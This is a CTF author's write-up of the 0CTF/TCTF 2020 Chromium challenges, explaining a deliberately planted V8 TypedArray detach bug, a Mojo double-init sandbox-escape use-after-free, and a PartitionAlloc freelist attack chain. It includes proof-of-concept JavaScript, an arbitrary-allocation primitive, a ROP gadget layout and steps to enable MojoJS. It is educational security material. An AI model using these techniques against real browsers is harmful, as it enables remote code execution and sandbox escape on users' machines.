0CTF/TCTF 2020 Chromium series challenge

First of all, this is the first browser-related CTF challenge I ever made. I’m very glad to see that players are actively participating. In the end, 29 teams solved Chromium RCE, 7 teams solved Chromium SBX and 2 teams solved Chromium Fullchain, huge props to all those teams.

There are already several public write-ups and I have learned a lot from them. Nevertheless, I would like to provide a summary from my perspective and provide more details.

Part Ⅰ: Chromium RCE

Heap exploitation has been the most popular category in recent years’ CTFs. However, many players have already been tired of it, so we prepared something different - to do a glibc heap exploitation via JavaScript.

diff --git a/src/builtins/typed-array-set.tq b/src/builtins/typed-array-set.tq
index b5c9dcb261..babe7da3f0 100644
--- a/src/builtins/typed-array-set.tq
+++ b/src/builtins/typed-array-set.tq
@@ -70,7 +70,7 @@ TypedArrayPrototypeSet(
     // 7. Let targetBuffer be target.[[ViewedArrayBuffer]].
     // 8. If IsDetachedBuffer(targetBuffer) is true, throw a TypeError
     //   exception.
-    const utarget = typed_array::EnsureAttached(target) otherwise IsDetached;
+    const utarget = %RawDownCast<AttachedJSTypedArray>(target);

     const overloadedArg = arguments[0];
     try {
@@ -86,8 +86,7 @@ TypedArrayPrototypeSet(
       // 10. Let srcBuffer be typedArray.[[ViewedArrayBuffer]].
       // 11. If IsDetachedBuffer(srcBuffer) is true, throw a TypeError
       //   exception.
-      const utypedArray =
-          typed_array::EnsureAttached(typedArray) otherwise IsDetached;
+      const utypedArray = %RawDownCast<AttachedJSTypedArray>(typedArray);

       TypedArrayPrototypeSetTypedArray(
           utarget, utypedArray, targetOffset, targetOffsetOverflowed)

The bug is trivial. We removed two DETACH checks in %TypedArray%.prototype.set, which gives us read/write primitive on a detached TypedArray. Besides, the ArrayBuffer Heap is managed by Glibc in d8 binary, so the situation is very similar to the traditional CTF heap challenge with four functions: Alloc, Delete, Show and Edit as follows:

// Alloc
let helper_ab = new ArrayBuffer(0x500);
let helper_ta = new Uint32Array(helper_ab);

let victim_ab = new ArrayBuffer(0x500);
let victim_ta = new Uint32Array(victim_ab);

// Delete
%ArrayBufferDetach(victim_ta);

// UAF Read/Show
helper_ta.set(victim_ta, 0);
console.log(helper_ta);

// UAF Write/Edit
helper_ta[0] = 0x41414141;
victim_ta.set(helper_ta, 0);

According to the writeups I received, most players used fastbin attack to overwrite the malloc_hook_ with one_gadget, while some other players found a way to trigger malloc instead of calloc so the tcache attack works and makes it much easier.

To solve the challenge, players only need to know(or learn) some basic knowledge of v8, along with glibc heap tricks(also basic for a CTF player). So it was no surprise that it became the lowest point in Pwn category, but I hope everyone had fun and learned something from it.

Part Ⅱ: Chromium SBX

Before we start, I would like to apologize for our dumb mistake, which initialy made this challenge deemed infeasible. We have tweeted about it and thanks @owodelta again for pointing it out.

So the intended bug should be the double-init, which is also a famous bug pattern inside Chromium Sandbox. Let’s take a look at the patch after the fix:

// content/browser/tstorage/tstorage_impl.cc

void TStorageImpl::Init(InitCallback callback) {
    inner_db_ = std::make_unique<InnerDbImpl>();

    std::move(callback).Run();
}

void TStorageImpl::CreateInstance(CreateInstanceCallback callback) {
    mojo::PendingAssociatedRemote<blink::mojom::TInstance> pending_remote;
    auto instance = std::make_unique<TInstanceImpl>(inner_db_.get());
    instance_receivers_.Add(
            std::move(instance),
            pending_remote.InitWithNewEndpointAndPassReceiver());

    std::move(callback).Run(std::move(pending_remote));
}

// third_party/blink/public/mojom/tstorage/tstorage.mojom

interface TStorage {
    Init() => ();
    CreateInstance() => (pending_associated_remote<blink.mojom.TInstance>? instance);
};

(Therefore, as we expected, there is only one way to trigger the bug by calling the TStorageImpl::Init twice. In such case, reseting TStorage pointer is useless since it will also invalidate all TInstances when it is deleted.)

Bug analysis

There are two IPC calls of TStorage interface. The first IPC Init creates a new InnerDbImpl and binds the new database to inner_db_. The second IPC CreateInstance creates a TInstanceImpl which accepts the raw pointer of inner_db_ for the construction, and sends it back to the Renderer Process.

RawPtr is known to be very dangerous in C++ and developers need to be very careful about its lifetime. In this challenge, the owner of the database is TStorageImpl::inner_db_, which is a std::unique_ptr to an InnerDbImpl. If we make a second call to Init, the previous inner_db_ will be replaced by a new one, causing the previous one to be released immediately. As a result, the raw pointer of the previous inner_db_ in TInstanceImpl becomes a dangling pointer, which leads to UAF on InnerDbImpl.

Thus, the PoC would look like this:

// Create TStorage
let tstorage = new blink.mojom.TStoragePtr()
Mojo.bindInterface(blink.mojom.TStorage.name,
                   mojo.makeRequest(tstorage).handle, "context")

// First init
tstorage.init();

// Create TInstance
let instance = new blink.mojom.TInstanceAssociatedPtr(
    (await tstorage.createInstance()).instance);

// Second init
tstorage.init();

// trigger UAF
instance.getTotalSize();

TCMalloc

The next step is to reuse the memory of free’d inner_db_. According to the great research from markbrand, Blob looks perfect for our goal. However, some of you might have noticed, the situation may not be the same as you expected. The blob is hard to fill in the hole of inner_db_.

Actually this is my second point in this challenge - TCMalloc. Chromium uses tcmalloc for its heap management. In the challenge, vulnerable objects are all running in the UI Thread, while blobs are allocated/released in the IO Thread, so they are landed on the different threads and it could be very difficult to fill in the hole from a different ThreadCache.

Let’s take a look at the official introduction:

TCMalloc assigns each thread a thread-local cache. Small allocations are satisfied from the thread-local cache. Objects are moved from central data structures into a thread-local cache as needed, and periodic garbage collections are used to migrate memory back from a thread-local cache into the central data structures.

In summary, all mild operations on the heap are trapped in the thread. Each ThreadCache is unreachable from the other one. However, chunks in CentralThread could be moved to any ThreadCache, i.e. the chunks in the CentralThread could be accessed from any ThreadCache as needed.

There are at least two approaches to do a reliable exploit. The first one is to move the victim to the CentralCache, so that we can easily take it off; the other one is to find some usable allocations in the same thread. We will talk about the first one here, and leave the second to you, which could be helpful in the bonus challenge :)

According to the references of ReleaseToCentralCache, we have several approaches to achieve the migration. Let’s take a look at one path for example.

inline ATTRIBUTE_ALWAYS_INLINE void ThreadCache::Deallocate(void* ptr, uint32 cl) {
  ASSERT(list_[cl].max_length() > 0);
  FreeList* list = &list_[cl];

  // This catches back-to-back frees of allocs in the same size
  // class. A more comprehensive (and expensive) test would be to walk
  // the entire freelist. But this might be enough to find some bugs.
  ASSERT(ptr != list->Next());

  uint32_t length = list->Push(ptr);

  if (PREDICT_FALSE(length > list->max_length())) {
    ListTooLong(list, cl);  <--------------------------------- [1]
    return;
  }

  size_ += list->object_size();
  if (PREDICT_FALSE(size_ > max_size_)){  <------------------- [2]
    Scavenge();
  }
}

void ThreadCache::ListTooLong(FreeList* list, uint32 cl) {
  size_ += list->object_size();

  const int batch_size = Static::sizemap()->num_objects_to_move(cl);
  ReleaseToCentralCache(list, cl, batch_size);  <----------- victim is moved to CentralCache

  // If the list is too long, we need to transfer some number of
  // objects to the central cache.  Ideally, we would transfer
  // num_objects_to_move, so the code below tries to make max_length
  // converge on num_objects_to_move.

  // ......
}

The above code snippet shows that, when the list is too long, some number of objects should be transferred to the central cache. So the solution is obvious. We only need to delete more databases after releasing the victim, and the linked list of the cache would be full. As a result, the free’d chunks will be moved to the CentralCache.

(By the way, after the discussion with Tim Becker, we found his writeup probably meets another condition[2]. After the huge destruction, the total size of the ThreadCache exceeds the max_size_, so it would do Scavenge and release the objects to the CentralCache.)

Infoleak

Now things are getting more general. Find a way to info leak then trigger the virtual call and do ROP. There are many materials from here, so I won’t go deep into it, however, I want to introduce a trick of base::queue.

base::queue is a four-pointer size structure which includes container, capacity, front and rear. If we leave everything zero, it will automatically init itself during the first push operation. It first allocates a container buffer for storing its elements, then stores the container pointer to itself. As a result, there is a heap pointer located at the blob and we can easily leak it out. (More details can be found in my talks)

before init:

           container        capacity
    - | 0x000000000000 | 0x000000000000 |
    - | 0x000000000000 | 0x000000000000 |
            front             rear
                       |
                       |
    after first push   |
                       |
 +------------+        |
 |            |        v
 |         container        capacity
 |  - | 0x1f15101a3440 | 0x000000000004 |
 |  - | 0x000000000000 | 0x000000000001 |
 |          front             rear
 |
 +--> 0x1f15101a3440(heap):
    - | arr[0] | hole | hole | hole |

In addition, I do recommend r3kapig’s writeup for further base::queue tricks.

Now we have got a heap address, we can then spray pages of heap which is first used by niklasb and ned. Or even better, we can use the queue itself to arrange the virtual table, since we are able to put any int64 on it.

Finally, we trigger the virtual call, ROP our way and get the flag.

Part Ⅲ: Chromium Fullchain

Finally we come to the finale.

The vulnerabilities are almost the same as the previous. It seems we only need a little effort to stick them up. But the truth is, as you see, things became much more complicated.

ArrayBuffer Neuter

The first obstacle is, I removed the native API %ArrayBufferDetach(Or we called it ArrayBufferNeuter some time ago) inside sandbox, so we should find a way to free the ArrayBuffer by ourselves.

There is a well-known trick in browser security. Javascript allows buffers to be transferred from a source thread to a Worker thread, and the transferred buffers are not accessible (“neutered”) in the source thread. In Chrome, it would also release the buffer of the ArrayBuffer.

After some research and experiments, we got the snippet of code:

const ENABLE_NATIVE = 0
function ArrayBufferDetach(ab) {
    if (ENABLE_NATIVE) {
        eval("%ArrayBufferDetach(ab);");
        return
    }
    let w = new Worker('');
    w.postMessage({ab: ab}, [ab]);
    w.terminate();
}

PartitionAlloc Bypass

Compared with the previous challenges, the most difficult part of fullchain is Heap Exploitation. In Chromium RCE, d8 uses ptmalloc for the heap management. However, when Chrome browser takes over the heap management, the memory allocator turns to PartitionAlloc. According to the official introduction, PartitionAlloc could be regarded as a kind of mitigation. It greatly hardens the security of the heap.

Around 2017, we(KeenLab) had several UAF bugs in ArrayBuffer Heap. I also tried to exploit them for Pwn2Own contest. I successfully pwned some of them on 32-bit arch(since the bug is used for Mobile Pwn2Own and browsers in the phone are 32-bit), but I have no idea about pwning it on 64-bit at that time. However, after the challenge, I find it is not unbreakable.

Well, let’s start our journey of PartitionAlloc. Like most heap allocator, there is also a freelist in PartitionAlloc. We can find it at the first pointer of the free’d chunk in Big-Endian. Let’s take a look in the debugger.

let victim_ab = new ArrayBuffer(0x500);
let victim_ta = new Uint32Array(victim_ab);

// Delete
%ArrayBufferDetach(victim_ta);

Note: 0x205284e08000 is a free’d chunk and the next free’d chunk is 0x205284e08500.

It is almost the same as tcache attack, except for the endianness. Since we have full control of the heap, this is not a problem. So just like tcache attack, we are able to allocate to any address we want.

Thus, together with the ArrayBufferDetach, we got the arb_alloc primitive.

async function arb_alloc(addr, size, ret=true) {
    let a_ab = new ArrayBuffer(size);
    let a_ta = new BigUint64Array(a_ab);
    let b_ab = new ArrayBuffer(size);
    let b_ta = new BigUint64Array(b_ab);
    new DataView(b_ab).setBigUint64(0, addr, false);
    await ArrayBufferDetach(a_ab);
    a_ta.set(b_ta, 0);
    a_ab = new ArrayBuffer(size);
    if (ret) return new ArrayBuffer(size);
}

The next question is where to allocate. Since we only have heap address so far, let’s see what’s on it.

In fact, the heap address we leaked is in one of the SuperPages of PartitionAlloc. The layout of the SuperPage is as follows:

| Guard page (4KB) | Metadata page (4KB) | Guard pages (8KB) | Slot span | Slot span | ... | Slot span | Guard page (4KB) |

0x0000205284e00000 0x0000205284e01000 ---p  // Guard page (4KB)
0x0000205284e01000 0x0000205284e02000 rw-p  // Metadata page (4KB)
0x0000205284e02000 0x0000205284e04000 ---p  // Guard pages (8KB)
0x0000205284e04000 0x0000205284e18000 rw-p  // Slot span
0x0000205284e18000 0x0000205285000000 ---p  // Guard pages (4KB)

There are two writable pages in SuperPage. Slot span is just the DATA buffer, and the metadata page seems more interesting.

As you see, we can find Chrome address in metadata page! To leak the address, we can first allocate to the metadata page(e.g. 0x205284e01060), then create a new ArrayBuffer with an unused size, it will also create a new bucket and append some useful information to the metadata which we have already claimed.

After leaking Chrome address, we are able to allocate to global DATA segment of Chrome. Our goal is to turn on the MojoJS flag for the sandbox bypass, which requires arbitrary read/write according to markbrand’s exploit. My first thought is to leak the address of v8 heap, so that we can take control of the JS objects and do AAR/AAW as usual. However, our arb_alloc primitive has a weakness, that is it is more like calloc rather than malloc, which means it will first clear everything in the buffer before being taken out.

Luckily, after reading the source code of PartitionAlloc, i found that just like most memory allocators, there are also some allocator hooks located at global DATA segment such like allocation_override_hook_ and free_override_hook_. Overwriting these hooks gives us the ability to control $rip register and even do ROP with a stack pivot. True, it is enough to achieve code execution in Renderer Process, but it is not good enough for the sandbox escape, because we must guarantee the context of the process stay valid. So the best way is still to find the heap address of v8.

Anyway, let’s see if there is anything useful when it crashes.

If you are familiar with v8, you probably have realized that $r10 points to a v8 object. However, actually $r13 is better for us in our case. This is because we can find the address of v8 heap in $r13, but not in $r10.

Remember that we are in the hook of an allocation, so the return of the function is also the allocated buffer which will be sent back to Javascript. In other words, if we can find a gadget to set $r13 to the return value and ensure the context is not destroyed, we will get an ArrayBuffer whose data_ptr points to $r13.

The solution is shown in the diagram. We first move $r13 to $rax, then pop the stack to frame #6 directly.

#0  0x0000000041414141 in  () ; any gadget
    push   rax  ; for stack alignment
    mov    rax, r13
    add    rsp, 0x28  ---------------------------------------------------------+
    pop    rbx                                                                 |
    pop    r12                                                                 |
    pop    r13                                                                 |
    pop    r14                                                                 |
    pop    r15                                                                 |
    pop    rbp                                                                 |
    ret                                                                        |
#1  0x000055f8f5bac154 in base::PartitionRoot<true>::AllocFlags                |
#2  0x000055f8f5bac154 in blink::ArrayBufferContents::AllocateMemoryWithFlags  |
#3  <libc++ wrong stack frame>                                                 |
#4  <libc++ wrong stack frame>                                                 |
#5  0x000055f8f0577562 in v8::internal::Heap::AllocateExternalBackingStore     |
    test   rax, rax                                                            |
    je     0x55f8f0577576                                                      |
    add    rsp, 0x8                                                            |
    pop    rbx      <----------------------------------------------------------+
    pop    r12
    pop    r13
    pop    r14
    pop    r15
    pop    rbp
    ret
#6  0x000055f8f0717fc0 in v8::internal::BackingStore::Allocate

Since the pattern of the gadget is very common in the binary, we can easily find one at offset 0x6f81e30 in our challenge. More importantly, we skip the bzero operation in original allocation function, so we can take everything out from the heap and leak the address of v8 heap finally.

If you are following v8, you probably know that Pointer Compression has landed since version 8.0. With pointer compression, the offset of the objects in Old Space is fixed, plus we have already leaked the base address, we can easily corrupt the objects in Javascript via arb_alloc and finally turns to addrof, read and write primitive.

After turning on the MojoJS flag by AAR/AAW, the last step is to refresh the webpage to enable the feature. However, since the JS context is going to be recreated, all objects are marked as dead and their memory must be reclaimed. Further, it is difficult to avoid segmentation fault when the Garbage Collection tries to reclaim the corrupted ArrayBuffer objects and processes with the freelist.

This is one of the biggest difficulties in the challenge, but since we already have the ability to arbitrary R/W, we can patch the related functions to prevent the crash. In addtion, there is another simple way, that is, to overwrite free_hook_ with an empty function, so the free operation does not actually take effect. It perfectly avoid crash during the Garbage Collection since nothing actually happens.

Moreover, after reading ohjin’s exploit, I learned there is another flag blink::RuntimeEnabledFeatures::is_mojo_js_enabled_ located at the global data segment, which could be used to turn the MojoJS on as well. This makes things much easier. We only need to use arb_alloc to overwrite is_mojo_js_enabled_ flag and free_hook_, then the door to the next stage opens.

In summary, with no need for AAR/AAW, the steps of PartionAlloc attack could be:

leak the heap address
allocate to Metadata page and leak the chrome address
allocate to free_hook then overwrite it with an empty_function(\xc3 shellcode)
allocate to is_mojo_js_enabled_ then overwrite it with 1
window.location.reload()

After the refresh, everything is exactly the same as Part Ⅱ. Cheers!

By the way, after the game I learned from @owodelta there was a wild exploit of PartitionAlloc last month, which seems really cool! And this approach is used by @owodelta in his writeup of fullchain, MUST SEE!!!

Part Ⅳ: Chromium Fullchain++

As I mentioned above, I prepared a bonus challenge. Notice that I left some message in the patch.

+// NOTE: On Windows platform, binary and library address of chrome main process is same
+// as renderer process, so we suppose you already have these addresses in SBX challenge.
+// In fact, even without these two functions, you can also solve this problem, but I don't
+// think it's friendly to players in a 48-hour game. Maybe you can try it after the match :)
+void TStorageImpl::GetLibcAddress(GetLibcAddressCallback callback) {
+    std::move(callback).Run((uint64_t)(&atoi));
+}
+void TStorageImpl::GetTextAddress(GetTextAddressCallback callback) {
+    std::move(callback).Run((uint64_t)(&TStorageImpl::Create));
+}

As you see, the first challenge of the bonus is: how to exploit it without these two backdoors. If you manage to do it, try the second one: how about CFI enabled. CFI prevents from all indirect calls hijacking. The mitigation has already been deployed on Linux and ChromeOS official building and I believe this is the trend.

The solution of these two add-ons depends on the design of the challenge, so it might not be very general, but I’m pretty sure you could learn something from it more or less. When you solve the bonus challenge, please let me know and for the first 3 winners I will mail some gifts to you, might be some T-shirts or something like that :) Also, I will release my exploit after 3 solves.

Chromium Fullchain++

Try to solve the fullchain again with CFI enabled.
If you manage to execute ./flag_printer, please send me the exploit and I’ll check it locally. My email address is in the attachment.

Note: since no one else has checked the challenge, there might be some mistakes. Please contact me if you find anything wrong.

Attachment here

0CTF/TCTF 2020 Chromium series challenge

Part Ⅰ: Chromium RCE

Part Ⅱ: Chromium SBX

Bug analysis

TCMalloc

Infoleak

Part Ⅲ: Chromium Fullchain

ArrayBuffer Neuter

PartitionAlloc Bypass

Part Ⅳ: Chromium Fullchain++

Top players of Chromium Fullchain++

Reference

Public Writeups:

Great Research(from chrome-sbx-db)

Credit